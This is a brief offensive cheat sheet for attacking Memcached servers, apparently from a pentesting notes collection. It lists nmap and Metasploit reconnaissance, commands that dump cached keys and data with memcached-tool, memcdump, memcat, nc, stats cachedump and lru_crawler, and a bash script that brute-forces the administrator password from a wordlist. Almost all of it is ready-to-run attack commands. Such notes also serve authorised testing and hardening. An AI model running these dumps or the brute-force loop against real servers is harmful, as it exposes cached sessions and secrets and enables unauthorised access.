Memcached

  • Recon


Memcache uses by default the port: 11211

 

Nmap

Reconnaissance with nmap:

nmap -p 11211 --script memcached-info x.x.x.x

 

Metasploit

Module metasploit to find data stored in the cache:

auxiliary/gather/memcached_extractor

 

memcache-tool

# usr/share/memcached/scripts/memcached-tool
memcached-tool 10.0.0.5:11211 dump 

 

libmemcached-tools

memcstat --servers=x.x.x.x
memcdump --servers=x.x.x.x
memcat --servers=x.x.x.x key_to_retrieve

 

Login

telnet x.x.x.x 11211
echo -e 'stats items' | nc -q1 x.x.x.x 11211

 

Cache dump

stats slabs
stats cachedump 1 100

 

Recover data from warm cache

lru_crawler metadump all

 

Brute force

#!/bin/bash

while read p; do
  if memcstat --servers=x.x.x.x --username=administrator --password=$p | grep -q Server; then
    echo "Password found $p"
    break
  fi
done < $1

# ./script.sh passwords.txt